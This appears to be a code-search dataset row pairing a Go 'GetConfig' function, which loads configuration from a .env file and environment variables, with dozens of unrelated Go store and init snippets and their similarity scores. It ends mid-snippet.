sessionID\n\ts.defaultExpiration = defaultExpiration\n\n\tif s.data == nil { // Ensure the store always has a valid pointer of Dict\n\t\ts.data = new(Dict)\n\t}\n}", "func NewStore() *Store {\n\treturn &Store{\n\t\topaStore: inmem.New(),\n\t}\n}", "func init() {\n\tkmerSize = indexCmd.Flags().IntP(\"kmerSize\", \"k\", 31, \"size of k-mer\")\n\tsketchSize = indexCmd.Flags().IntP(\"sketchSize\", \"s\", 21, \"size of MinHash sketch\")\n\twindowSize = indexCmd.Flags().IntP(\"windowSize\", \"w\", 100, \"size of window to sketch graph traversals with\")\n\tnumPart = indexCmd.Flags().IntP(\"numPart\", \"x\", 8, \"number of partitions in the LSH Ensemble\")\n\tmaxK = indexCmd.Flags().IntP(\"maxK\", \"y\", 4, \"maxK in the LSH Ensemble\")\n\tmaxSketchSpan = indexCmd.Flags().Int(\"maxSketchSpan\", 30, \"max number of identical neighbouring sketches permitted in any graph traversal\")\n\tmsaDir = indexCmd.Flags().StringP(\"msaDir\", \"m\", \"\", \"directory containing the clustered references (MSA files) - required\")\n\tindexCmd.MarkFlagRequired(\"msaDir\")\n\tRootCmd.AddCommand(indexCmd)\n}", "func NewStore() Store {\n\treturn Store{cmap.New()}\n}", "func New(options Options) (*BadgerStore, error) {\n\n\t// build badger options\n\tif options.BadgerOptions == nil {\n\t\tdefaultOpts := badger.DefaultOptions(\"\")\n\t\toptions.BadgerOptions = &defaultOpts\n\t}\n\toptions.BadgerOptions.Dir = options.Path\n\toptions.BadgerOptions.ValueDir = options.Path\n\toptions.BadgerOptions.SyncWrites = !options.NoSync\n\n\t// Try to connect\n\thandle, err := badger.Open(*options.BadgerOptions)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Create the new store\n\tstore := &BadgerStore{\n\t\tconn: handle,\n\t\tpath: options.Path,\n\t}\n\n\t// Start GC routine\n\tif options.ValueLogGC {\n\n\t\tvar gcInterval time.Duration\n\t\tvar mandatoryGCInterval time.Duration\n\t\tvar threshold int64\n\n\t\tif gcInterval = 1 * time.Minute; options.GCInterval != 0 {\n\t\t\tgcInterval = options.GCInterval\n\t\t}\n\t\tif mandatoryGCInterval = 10 * time.Minute; options.MandatoryGCInterval != 0 {\n\t\t\tmandatoryGCInterval = options.MandatoryGCInterval\n\t\t}\n\t\tif threshold = int64(1 << 30); options.GCThreshold != 0 {\n\t\t\tthreshold = options.GCThreshold\n\t\t}\n\n\t\tstore.vlogTicker = time.NewTicker(gcInterval)\n\t\tstore.mandatoryVlogTicker = time.NewTicker(mandatoryGCInterval)\n\t\tgo store.runVlogGC(handle, threshold)\n\t}\n\n\treturn store, nil\n}", "func New(client *ifirestore.Client) *Store {\n\treturn &Store{\n\t\tclient: client,\n\t}\n}", "func (a *Analytics) Init() {\n\tflag.IntVar(&a.lowerBound, \"l\", 100, \"lower size of input\")\n\tflag.IntVar(&a.upperBound, \"u\", 10000, \"upper size of input\")\n\tflag.IntVar(&a.step, \"s\", 100, \"step of increasing input size\")\n\tflag.IntVar(&a.repetitions, \"r\", 1000, \"number of repetitions for given input size\")\n\n\tflag.Parse()\n}", "func init() {\n\tflag.Parse()\n\n\tConfigBytes, err := ioutil.ReadFile(*ConfigFile)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\terr = json.Unmarshal(ConfigBytes, &Config)\n\tif err != nil {\n\t\tpanic(err)\n\t\t// TODO: add line numbers to log so i can use log.fatal\n\t\t// https://golang.org/pkg/log/#pkg-examples\n\t\t// logger := log.New(os.Stderr, \"OH NO AN ERROR\", log.Llongfile)\n\t}\n\n\tProducts, err = search.New(Config.Search)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func New() *Store {\n\treturn &Store{}\n}", "func New() *Store {\n\treturn &Store{}\n}", "func New(path string, config *Config) (*Store, error) {\n\t// open the store\n\tf, err := os.OpenFile(path, os.O_RDWR|os.O_CREATE, 0755)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar dS = &Store{\n\t\tConfig: config,\n\t\tf: f,\n\t\trecords: map[string]interface{}{},\n\t}\n\n\tswitch config.StoreType {\n\tcase JSONStore:\n\t\tdS.Storer = JSONDataStore{}\n\tcase YAMLStore:\n\t\tdS.Storer = YAMLDataStore{}\n\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"unsupported store type: %v\", config.StoreType)\n\t}\n\n\t// read records into store\n\tif err := dS.Open(f, dS.records); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// configure name\n\tif config.StoreName == \"\" {\n\t\tconfig.StoreName = dS.f.Name()\n\t}\n\n\treturn dS, nil\n}", "func Open(o ...option.Option) (store.Store, error) {\n\tres := &mock{\n\t\tstreams: streamMap{},\n\t}\n\tif err := option.Apply(res, o...); err != nil {\n\t\treturn nil, err\n\t}\n\treturn res, nil\n}", "func Init(path string) {\n\tvar err error\n\tStore, err = badgerdb.Open(path, true)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func NewStore() *Store {\n\treturn &Store{commands: make(map[string]*Config, 0)}\n}", "func New(s shorter.Store, c interface{}) (shorter.Shorter, error) {\n\t// load extends configuration\n\t// TODO: implement\n\treturn nil, errors.New(\"unimplemented\")\n}", "func NewStore(path string) *Store {\n\topts := NewEngineOptions()\n\topts.Config = NewConfig()\n\n\treturn &Store{\n\t\tpath: path,\n\t\tEngineOptions: opts,\n\t\tLogger: log.New(os.Stderr, \"[store] \", log.LstdFlags),\n\t}\n}", "func execmScannerInit(_ int, p *gop.Context) {\n\targs := p.GetArgs(2)\n\tret := args[0].(*scanner.Scanner).Init(args[1].(io.Reader))\n\tp.Ret(2, ret)\n}", "func NewStore() *Store {\n\treturn &Store{\n\t\tRaftDir: \"\",\n\t\tRaftBindAddr: \"\",\n\t\tdata: make(map[string]string),\n\t}\n}", "func NewStore(connString, database string, opts ...StoreOption) (*EsRepository, error) {\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer cancel()\n\n\tclient, err := mongo.Connect(ctx, options.Client().ApplyURI(connString))\n\tif err != nil {\n\t\treturn nil, faults.Wrap(err)\n\t}\n\n\tr := &EsRepository{\n\t\tdbName: database,\n\t\tclient: client,\n\t\teventsCollectionName: defaultEventsCollection,\n\t\tsnapshotsCollectionName: defaultSnapshotsCollection,\n\t}\n\n\tfor _, o := range opts {\n\t\to(r)\n\t}\n\n\treturn r, nil\n}", "func New(provider storage.Provider) (*Store, error) {\n\tstore, err := provider.OpenStore(nameSpace)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to open did anchor store: %w\", err)\n\t}\n\n\treturn &Store{\n\t\tstore: store,\n\t}, nil\n}", "func (c *StateStore) Init(metadata state.Metadata) error {\n\tconnInfo := metadata.Properties\n\tb, err := json.Marshal(connInfo)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvar creds credentials\n\terr = json.Unmarshal(b, &creds)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclient := documentdb.New(creds.URL, &documentdb.Config{\n\t\tMasterKey: &documentdb.Key{\n\t\t\tKey: creds.MasterKey,\n\t\t},\n\t})\n\n\tdbs, err := client.QueryDatabases(&documentdb.Query{\n\t\tQuery: fmt.Sprintf(\"SELECT * FROM ROOT r WHERE r.id='%s'\", creds.Database),\n\t})\n\tif err != nil {\n\t\treturn err\n\t} else if len(dbs) == 0 {\n\t\treturn fmt.Errorf(\"Database %s for CosmosDB state store not found\", creds.Database)\n\t}\n\n\tc.db = &dbs[0]\n\tcolls, err := client.QueryCollections(c.db.Self, &documentdb.Query{\n\t\tQuery: fmt.Sprintf(\"SELECT * FROM ROOT r WHERE r.id='%s'\", creds.Collection),\n\t})\n\tif err != nil {\n\t\treturn err\n\t} else if len(colls) == 0 {\n\t\treturn fmt.Errorf(\"Collection %s for CosmosDB state store not found\", creds.Collection)\n\t}\n\n\tc.collection = &colls[0]\n\tc.client = client\n\n\treturn nil\n}", "func Init(opts storage.Options) (storage.Engine, error) {\n\te := Engine{\n\t\tparts: make(map[string]map[string][]byte),\n\t}\n\n\treturn &e, nil\n}", "func New(config *Config) Store {\n\treturn newStore(config)\n}", "func New() kv.Store {\n\treturn newStore(newMapStore())\n}", "func New() *Store {\n\tc, errNew := ristretto.NewCache(&ristretto.Config{\n\t\tMaxCost: 1 << 30,\n\t\tNumCounters: 1e7,\n\t\tBufferItems: 1,\n\t})\n\tif errNew != nil {\n\t\tlog.Fatalf(\"failed to initialize cache: %v\", errNew)\n\t}\n\treturn &Store{store: c}\n}", "func InitWithOptions(conf interface{}, opts Options) error {\n\tcinfo, err := ParseWithOptions(conf, opts)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn cinfo.Read()\n}", "func NewStore(c *cli.Context) Store {\n\treturn &datastore{\n\t\tDB: open(c.String(\"database-config\")),\n\t}\n}", "func init() {\n\toptions.only = make(SelectedCollectors)\n\toptions.exclude = make(SelectedCollectors)\n\n\tflag.Var(&options.only, \"only\", \"Run only the listed collectors (comma-separated list of collector names)\")\n\tflag.Var(&options.exclude, \"exclude\", \"Run all the collectors except those listed (comma-separated list of collector names)\")\n\tflag.StringVar(&options.logLevel, \"log-level\", \"info\", \"Log level (one of 'warn', 'info', 'debug')\")\n}", "func (xratesKit *XRatesKit) Init(dbPath string) {\n\n\txratesKit.conf = config.Load()\n\txratesKit.ipfsHandler = &handler.Ipfs{&(xratesKit.conf.Ipfs)}\n\txratesKit.coinPaprika = &handler.CoinPaprika{&xratesKit.conf.CoinPaprika}\n\n\txratesKit.cacheService = &cache.CacheService{DBPath: dbPath}\n\txratesKit.cacheService.Init()\n\n}", "func NewStore(si *StoreInput) *Store {\n\tif si.Enhancer != nil {\n\t\treturn si.Enhancer(NewStore)(si.Reducer, si.State)\n\t}\n\n\tstore := &Store{\n\t\tstate: si.State,\n\t\treducer: si.Reducer,\n\n\t\tlisteners: NewListenerSet(),\n\t\tnextListeners: NewListenerSet(),\n\t}\n\n\tstore.dispatcher = makeDispatcher(store)\n\n\tstore.Dispatch(INITAction())\n\n\treturn store\n}", "func New(s blob.CAS, opts *Options) *Root {\n\tif opts == nil {\n\t\topts = new(Options)\n\t}\n\treturn &Root{\n\t\tcas: s,\n\n\t\tDescription: opts.Description,\n\t\tFileKey: opts.FileKey,\n\t\tIndexKey: opts.IndexKey,\n\t}\n}", "func New(addr, password string) *Store {\n\treturn &Store{\n\t\tpool: newPool(addr, password),\n\t}\n}", "func New(client *ifirestore.Client, crsID string) *StoreImpl {\n\treturn &StoreImpl{\n\t\tclient: client,\n\t\tcrsID: crsID,\n\t}\n}", "func InitOsStore() error {\n\tif err := context.InitKeyring(viper.GetString(\"openstack.user\"), viper.GetString(\"openstack.password\"), viper.GetString(\"openstack.tenant.name\"), viper.GetString(\"openstack.authurl\"), viper.GetString(\"openstack.tenant.id\"), viper.GetString(\"openstack.region\")); err != nil {\n\t\treturn err\n\t}\n\n\tif err := identity.DoAuth(); err != nil {\n\t\treturn err\n\t}\n\n\t// auto update Token each 30 minutes\n\tlogger := log.New(logger.Log.Writer(), \"osstore\", 0)\n\tStore = Storer(OsStore{})\n\t///store = &storee\n\tidentity.AutoUpdate(30, logger)\n\treturn nil\n}", "func init() {\n\tSettings.Search.UseBook = true\n\tSettings.Search.BookPath = \"./assets/books\"\n\tSettings.Search.BookFile = \"book.txt\"\n\tSettings.Search.BookFormat = \"Simple\"\n\n\tSettings.Search.UsePonder = true\n\n\tSettings.Search.UseQuiescence = true\n\tSettings.Search.UseQSStandpat = true\n\tSettings.Search.UseSEE = true\n\tSettings.Search.UsePromNonQuiet = true\n\n\tSettings.Search.UsePVS = true\n\tSettings.Search.UseAspiration = false\n\tSettings.Search.UseMTDf = false\n\n\tSettings.Search.UseIID = true\n\tSettings.Search.UseKiller = true\n\tSettings.Search.UseHistoryCounter = true\n\tSettings.Search.UseCounterMoves = true\n\tSettings.Search.IIDDepth = 6\n\tSettings.Search.IIDReduction = 2\n\n\tSettings.Search.UseTT = true\n\tSettings.Search.TTSize = 256\n\tSettings.Search.UseTTMove = true\n\tSettings.Search.UseTTValue = true\n\tSettings.Search.UseQSTT = true\n\tSettings.Search.UseEvalTT = false\n\n\tSettings.Search.UseMDP = true\n\tSettings.Search.UseRazoring = true\n\tSettings.Search.RazorMargin = 531\n\tSettings.Search.UseRFP = true\n\tSettings.Search.UseNullMove = true\n\tSettings.Search.NmpDepth = 3\n\tSettings.Search.NmpReduction = 2\n\n\tSettings.Search.UseExt = true\n\tSettings.Search.UseExtAddDepth = true\n\tSettings.Search.UseCheckExt = true\n\tSettings.Search.UseThreatExt = false\n\n\tSettings.Search.UseFP = true\n\tSettings.Search.UseQFP = true\n\tSettings.Search.UseLmp = true\n\tSettings.Search.UseLmr = true\n\tSettings.Search.LmrDepth = 3\n\tSettings.Search.LmrMovesSearched = 3\n}", "func NewStore(path string)(*BadgerStore, error){\n\treturn New(Options{Path: path, StorageOptions: &badger.DefaultOptions})\n}", "func NewStore(opts *redis.Options, expiration time.Duration,\n\tprefix ...string) base64Captcha.Store {\n\tif opts == nil {\n\t\tpanic(\"options cannot be nil\")\n\t}\n\treturn NewRedisStore(\n\t\tredis.NewClient(opts),\n\t\texpiration,\n\t\tprefix...,\n\t)\n}", "func NewStore(client dbClient, validSec int) *Store {\n\treturn &Store{\n\t\tclient: client,\n\t\tvalid: time.Duration(validSec) * time.Second,\n\t}\n}", "func New(client *ifirestore.Client) *StoreImpl {\n\treturn &StoreImpl{\n\t\tclient: client,\n\t}\n}" ]
[ "0.6040634", "0.6040634", "0.6040634", "0.5996873", "0.58918715", "0.5885029", "0.5856279", "0.5775144", "0.5730361", "0.56557924", "0.5648506", "0.5630458", "0.5617305", "0.5564756", "0.55376226", "0.5534137", "0.5514809", "0.5432588", "0.54181623", "0.53568417", "0.5354101", "0.53212714", "0.53141075", "0.53037417", "0.52901983", "0.5274232", "0.5267226", "0.5260913", "0.5252467", "0.5222463", "0.52209365", "0.5191523", "0.51554966", "0.5135127", "0.51349795", "0.51147395", "0.5101137", "0.50745565", "0.50621206", "0.505662", "0.50204223", "0.5019077", "0.50168854", "0.50152767", "0.5011735", "0.5003883", "0.49630418", "0.49545696", "0.49465504", "0.49306548", "0.49271023", "0.49252412", "0.49246037", "0.49243715", "0.4923976", "0.49180526", "0.49148515", "0.49018812", "0.48929828", "0.48853335", "0.48730412", "0.48559335", "0.48274645", "0.48241457", "0.48104295", "0.48074472", "0.48018855", "0.47955272", "0.47911075", "0.47898963", "0.47898963", "0.47861347", "0.47833386", "0.4781409", "0.47759745", "0.47737658", "0.476945", "0.47638404", "0.47599506", "0.47551054", "0.47413337", "0.4740731", "0.47404152", "0.47377294", "0.47318503", "0.47277057", "0.47240204", "0.47146097", "0.47090238", "0.47077352", "0.469968", "0.46904445", "0.46898887", "0.4683052", "0.46829927", "0.46810237", "0.46756405", "0.46682134", "0.46641153", "0.46611556" ]
0.6672689
0
GetConfig returns configuration data from .env file or env variables.
func GetConfig() (*Config, error) { var err error if _, err = os.Stat(".env"); !os.IsNotExist(err) { err = godotenv.Load() if err != nil { return nil, err } } var conf Config err = envconfig.Process("", &conf) if err != nil { return nil, err } if utf8.RuneCountInString(conf.Delimiter) != 1 { return nil, ErrIncorrectDelimiter } conf.FieldDelimiter, _ = utf8.DecodeRuneInString(conf.Delimiter) return &conf, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Get() (*Config, error) {\n\tconf := Config{}\n\tif err := env.Parse(&conf); err != nil {\n\t\treturn nil, err\n\t}\n\treturn &conf, nil\n}", "func getConfig() Conf {\n\tfile, _ := os.Open(\"config/config.json\")\n\tdefer file.Close()\n\tdecoder := json.NewDecoder(file)\n\tConfig := defaultConfig()\n\terr := decoder.Decode(&Config)\n\tif err != nil {\n\t\tfmt.Println(\"error:\", err)\n\t}\n\treturn Config\n}", "func GetConfig() interface{} {\n\treturn std.GetConfig()\n}", "func (b *Bootstrapper) getConfig() iris.Configuration {\n\t// Flag parsing to have `env` available\n\tflag.Parse()\n\n\t// Default configuration file loaded first\n\tvar confFile iris.Configuration\n\tdefaultFilePath := \"./configs/iris.yml\"\n\tif _, err := os.Stat(defaultFilePath); err == nil {\n\t\tconfFile = iris.YAML(defaultFilePath)\n\t} else {\n\t\tconfFile = iris.DefaultConfiguration()\n\t}\n\n\t// If not the default environment\n\tif *env != \"dev\" {\n\t\tfilePath := \"./configs/iris.\" + *env + \".yml\"\n\n\t\tif _, err := os.Stat(filePath); err == nil {\n\t\t\t// If environment is not set correctly, app will not start\n\t\t\tenvConfFile := iris.YAML(filePath)\n\n\t\t\t// Merging the default confFile with env file, overriding values\n\t\t\tmergo.Merge(&confFile, envConfFile, mergo.WithOverride)\n\t\t} else {\n\t\t\tb.Logger().Debugf(\"Error with conf file: \", err)\n\t\t}\n\t}\n\n\t// Type asserting app name and applying default if not provided\n\t_, ok := confFile.GetOther()[\"appName\"]\n\tif !ok {\n\t\tconfFile.GetOther()[\"appName\"] = \"fluffy\"\n\t}\n\n\t// Type asserting host address and applying default if not provided\n\t_, ok = confFile.GetOther()[\"host\"]\n\tif !ok {\n\t\tconfFile.GetOther()[\"host\"] = \":8888\"\n\t}\n\n\treturn confFile\n}", "func Get() Config {\n\tcfg := Config{}\n\tenvconfig.MustProcess(\"\", &cfg)\n\treturn cfg\n}", "func Get() (*Config, error) {\n\tcfg := &Config{}\n\tgoenv.StringVar(&cfg.TEST, TESTEnvName, \"value for test\")\n\tgoenv.IntVar(&cfg.TEST2, TEST2EnvName, 123)\n\tgoenv.DurationVar(&cfg.TEST3, TEST3EnvName, 5*time.Second)\n\n\t//goenv.Parse()\n\t//if cfg.Mongo.URL == \"\" {\n\t//\treturn nil, fmt.Errorf(\"could not set %s\", DBConnStrEnvName)\n\t//}\n\treturn cfg, nil\n}", "func GetConfig() models.Config {\n\t// Use by default ./config.json\n\tconfig, err := loadConfiguration(\"./config.json\")\n\tif err != nil {\n\t\t// If it doesn't exist, take environnement variables\n\t\tconfig = models.Config{\n\t\t\tURI: os.Getenv(\"MONGODB_URI\"),\n\t\t\tDatabase: os.Getenv(\"DATABASE\"),\n\t\t\tSecret: os.Getenv(\"SECRET\"),\n\t\t\tGmailAddress: os.Getenv(\"GMAIL_ADDRESS\"),\n\t\t\tGmailPassword: os.Getenv(\"GMAIL_PASSWORD\"),\n\t\t\tStripeKey: os.Getenv(\"STRIPE_KEY\"),\n\t\t\tBucketName: os.Getenv(\"BUCKET_NAME\"),\n\t\t\tBucketPubURL: os.Getenv(\"BUCKET_PUB_URL\"),\n\t\t}\n\t\treturn config\n\t}\n\treturn config\n}", "func Get() (*Config, error) {\n\tif cfg != nil {\n\t\treturn cfg, nil\n\t}\n\n\tcfg = &Config{\n\t\tBindAddr: \":23300\",\n\t\tCORSAllowedOrigins: \"*\",\n\t\tShutdownTimeout: 5 * time.Second,\n\t\tHealthCheckInterval: 30 * time.Second,\n\t\tHealthCheckCriticalTimeout: 90 * time.Second,\n\t}\n\n\treturn cfg, envconfig.Process(\"\", cfg)\n}", "func GetConfig(useGCPSecrets bool,\n\tyamlConfig bool, jsonConfig bool,\n\tfilePath string, config interface{}) error {\n\tvar data []byte\n\tvar err error\n\tif yamlConfig && jsonConfig {\n\t\treturn errors.New(\"yamlconfig and jsonconfig cannot both be true\")\n\t}\n\n\tif useGCPSecrets {\n\t\tgcloudVars := setGcloudVars()\n\t\tdata, err = gcloudVars.getSecretFromGSM()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tdata, err = ioutil.ReadFile(filePath)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tif yamlConfig {\n\t\terr = yaml.Unmarshal([]byte(data), &config)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else if jsonConfig {\n\t\terr = json.Unmarshal([]byte(data), &config)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}", "func GetConfig() {\n\n\tenv := true\n\ttempcfgdbhostname := os.Getenv(\"APP_DB_HOSTNAME\")\n\ttempcfgport := os.Getenv(\"APP_PORT\")\n\tif tempcfgdbhostname != \"\" {\n\t\tglobalconfig.DBHostName = tempcfgdbhostname\n\t} else {\n\t\tenv = false\n\t}\n\tif tempcfgport != \"\" {\n\t\tglobalconfig.HTTPPortNumber = tempcfgport\n\t} else {\n\t\tenv = false\n\t}\n\n\tif env == false {\n\t\tconfigbytes, err := ioutil.ReadFile(\"config.json\")\n\t\tif err != nil {\n\t\t}\n\t\terr = json.Unmarshal(configbytes, &globalconfig)\n\t\tfmt.Println(globalconfig)\n\t\tif err == nil {\n\t\t\tglobalconfig.Method = \"CofigFile\"\n\t\t}\n\t} else {\n\t\tglobalconfig.Method = \"EnvironmentVars\"\n\t}\n}", "func (repo ConfigRepository) Get() (*domain.Config, error) {\n\trepo.ensureConfigFile()\n\tconfigFile, err := os.Open(config.ConfigFilePath)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer configFile.Close()\n\tconfigData, err := ioutil.ReadAll(configFile)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tvar config domain.Config\n\terr = json.Unmarshal(configData, &config)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn &config, nil\n}", "func GetConfig() (config *Config, err error) {\n\tconfigpath := path.Join(os.Getenv(\"GOPATH\"), \"src\", \"hellofresh\", \"config.json\")\n\tconfigFile, err := os.Open(configpath)\n\tdefer configFile.Close()\n\n\tif err != nil {\n\t\treturn\n\t}\n\n\tjsonParser := json.NewDecoder(configFile)\n\tif err = jsonParser.Decode(&config); err != nil {\n\t\treturn\n\t}\n\n\treturn\n}", "func Get() (*Config, error) {\n\tif cfg != nil {\n\t\treturn cfg, nil\n\t}\n\n\tcfg = &Config{\n\t\tBindAddr: \"localhost:25100\",\n\t\tAwsRegion: \"eu-west-1\",\n\t\tUploadBucketName: \"dp-frontend-florence-file-uploads\",\n\t\tEncryptionDisabled: false,\n\t\tGracefulShutdownTimeout: 5 * time.Second,\n\t\tHealthCheckInterval: 30 * time.Second,\n\t\tHealthCheckCriticalTimeout: 90 * time.Second,\n\t\tVaultToken: \"\",\n\t\tVaultAddress: \"http://localhost:8200\",\n\t\tVaultPath: \"secret/shared/psk\",\n\t}\n\n\treturn cfg, envconfig.Process(\"\", cfg)\n}", "func getConfig() (Config, error) {\n\tvar configPath string\n\tvar err error\n\n\tif !configRead {\n\t\tconfigPath, err = getConfigPath()\n\t\tif err != nil {\n\t\t\treturn Config{}, err\n\t\t}\n\t\tconfig, err = parseConfig(configPath)\n\t\tif err != nil {\n\t\t\treturn Config{}, err\n\t\t}\n\t\tconfigRead = true\n\t}\n\n\treturn config, nil\n}", "func GetConfig() (models.Config, error) {\n\tconfig, err := ReadConfig(\"conf/config.json\")\n\n\tif err != nil {\n\t\treturn config, errors.New(\"Invalid config file\")\n\t}\n\n\treturn config, nil\n}", "func (o Ocs) GetConfig(w http.ResponseWriter, r *http.Request) {\n\tmustNotFail(render.Render(w, r, response.DataRender(&data.ConfigData{\n\t\tVersion: \"1.7\", // TODO get from env\n\t\tWebsite: \"ocis\", // TODO get from env\n\t\tHost: \"\", // TODO get from FRONTEND config\n\t\tContact: \"\", // TODO get from env\n\t\tSSL: \"true\", // TODO get from env\n\t})))\n}", "func Get() *Config {\n\tonce.Do(func() {\n\t\tenvType := os.Getenv(\"WAKEUP_ENV\")\n\t\tif envType == \"\" {\n\t\t\tenvType = \"dev\"\n\t\t}\n\t\tif err := configor.New(&configor.Config{Environment: envType}).Load(&config, \"config.json\"); err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t\tconfigBytes, err := json.MarshalIndent(config, \"\", \" \")\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t\tfmt.Println(\"Configuration:\", string(configBytes))\n\t})\n\treturn &config\n}", "func GetConfig() Config {\n\tonce.Do(func() {\n\n\t\tconfigPath := os.Getenv(\"CONFIG\")\n\t\tif configPath == \"\" {\n\t\t\tlogger.Fatal(\"Error:Config environment variable not found\")\n\t\t}\n\t\tlogger.Info(\"Using config file at %v\", configPath)\n\t\tconfigFile, err := os.Open(configPath)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(\"Error:Config file Path\", err)\n\t\t}\n\t\tdefer configFile.Close()\n\t\tjsonParser := json.NewDecoder(configFile)\n\t\tif err = jsonParser.Decode(&config); err == nil {\n\t\t\tlogger.Info(\"successfully parsed config %+v\", config)\n\t\t} else {\n\t\t\tlogger.Fatal(\"Error:\", err)\n\t\t}\n\t})\n\n\treturn config\n}", "func GetConfig() (*Config, error) {\n\tvar env string\n\tvar configPath string\n\n\t// Command-line flags\n\tflag.StringVar(&env, \"env\", \"development\", \"environment of server\")\n\tflag.StringVar(&configPath, \"config\", \"\", \"path to config file\")\n\n\tflag.Parse()\n\n\t// Default config path\n\tif configPath == \"\" {\n\t\tconfigPath = filepath.Join(\"config\", \"environment\", env+\".yml\")\n\t}\n\n\t// Get the config file and decode it\n\tconfigPath, err := filepath.Abs(configPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tconfigFile, err := os.Open(configPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcfg := new(Config)\n\n\tdec := yaml.NewDecoder(configFile)\n\terr = dec.Decode(cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Config Defaults\n\tif cfg.GinMode == \"\" {\n\t\tswitch cfg.Env {\n\t\tcase \"development\":\n\t\t\tcfg.GinMode = \"development\"\n\t\tcase \"test\":\n\t\t\tcfg.GinMode = \"test\"\n\t\tcase \"production\":\n\t\t\tcfg.GinMode = \"production\"\n\t\tdefault:\n\t\t\tcfg.GinMode = \"development\"\n\t\t}\n\t}\n\n\treturn cfg, nil\n}", "func getConfig(context *cli.Context) *lib.Config {\n\tconfig, _, err := lib.GetConfig(context)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\treturn config\n}", "func GetConfig(configFileName string, trafficOpsHost string, trafficServerHost string, params []TrafficOpsParameter) (string, error) {\n\tswitch configFileName {\n\tcase \"storage.config\":\n\t\treturn createStorageDotConfig(trafficOpsHost, trafficServerHost, params)\n\tdefault:\n\t\treturn \"\", errors.New(\"Config file '%s' not valid\")\n\t}\n}", "func getConfig(fpath string) {\n\traw, err := ioutil.ReadFile(fpath)\n\tif err != nil {\n\t\tglog.Errorf(\"Failed to read config %q, err: %v\", fpath, err)\n\t\tos.Exit(1)\n\t}\n\terr = json.Unmarshal(raw, &ctx.config)\n\tif err != nil {\n\t\tglog.Errorf(\"Failed to json-unmarshal config %q, err: %v\", fpath, err)\n\t\tos.Exit(1)\n\t}\n}", "func Get() (*Config, error) {\n\tif cfg != nil {\n\t\treturn cfg, nil\n\t}\n\n\tcfg = &Config{\n\t\tBindAddr: \"localhost:25500\",\n\t\tGracefulShutdownTimeout: 5 * time.Second,\n\t\tHealthCheckInterval: 30 * time.Second,\n\t\tHealthCheckCriticalTimeout: 90 * time.Second,\n\t\tDefaultMaxLimit: 1000,\n\t\tDefaultLimit: 20,\n\t\tDefaultOffset: 0,\n\t\tMongoConfig: MongoConfig{\n\t\t\tBindAddr: \"localhost:27017\",\n\t\t\tCollection: \"areas\",\n\t\t\tDatabase: \"areas\",\n\t\t},\n\t}\n\n\treturn cfg, envconfig.Process(\"\", cfg)\n}", "func Get() (*Config, error) {\n\tdir, err := getConfigDir()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcfg := newConfig()\n\tdata, err := loadConfigData(dir)\n\tif err != nil {\n\t\tif _, ok := err.(*configNotFoundError); ok {\n\t\t\treturn cfg, nil\n\t\t}\n\t\treturn nil, err\n\t}\n\n\terr = json.Unmarshal(data, &cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn cfg, nil\n}", "func Get() (*Configuration, error) {\n\tif cfg != nil {\n\t\treturn cfg, nil\n\t}\n\n\tcfg = &Configuration{\n\t\tBindAddr: \":8082\",\n\t}\n\n\treturn cfg, envconfig.Process(\"\", cfg)\n}", "func GetConfigData(f string, mergeEnv bool) (interface{}, error) {\n\tvar conf interface{}\n\t// First load any env data from files\n\tlogDebug.Printf(\"Loading config file:%s\\n\", f)\n\n\tb, err := ioutil.ReadFile(f)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"error reading file '%s':%s\", f, err)\n\t}\n\tlogInfo.Printf(\"Loaded config data from %s\", f)\n\t// Allow templating of config data (e.g. env overrides of chart values):\n\tk8api := NewK8ApiNoop()\n\trendered, _, err := Render(k8api, string(b), EnvToMap())\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"error trying to render config data file '%s':%s\",\n\t\t\tf,\n\t\t\terr)\n\t}\n\n\t// Load yaml\n\tif err := yaml.Unmarshal([]byte(rendered), &conf); err != nil {\n\t\treturn nil, err\n\t}\n\t// Update any values which DON't exist from environment\n\tif mergeEnv && reflect.TypeOf(conf).Kind() == reflect.Map {\n\t\tconfTyped := conf.(map[interface{}]interface{})\n\t\tfor k, v := range EnvToMap() {\n\t\t\tif _, ok := confTyped[k]; !ok {\n\t\t\t\t// Value NOT found - update map:\n\t\t\t\tconfTyped[k] = v\n\t\t\t\tlogDebug.Printf(\"updated key %s from environment\", k)\n\t\t\t}\n\t\t}\n\t\t// Replace the referenced data with the strongly typed reference\n\t\tconf = confTyped\n\t}\n\treturn conf, nil\n}", "func Get() (*ApplicationConfig, error) {\n\tcfg := ApplicationConfig{}\n\n\t// parse environment variables if needed\n\tinsecure, err := strconv.ParseBool(os.Getenv(\"INSECURE\"))\n\tif err != nil {\n\t\tinsecure = 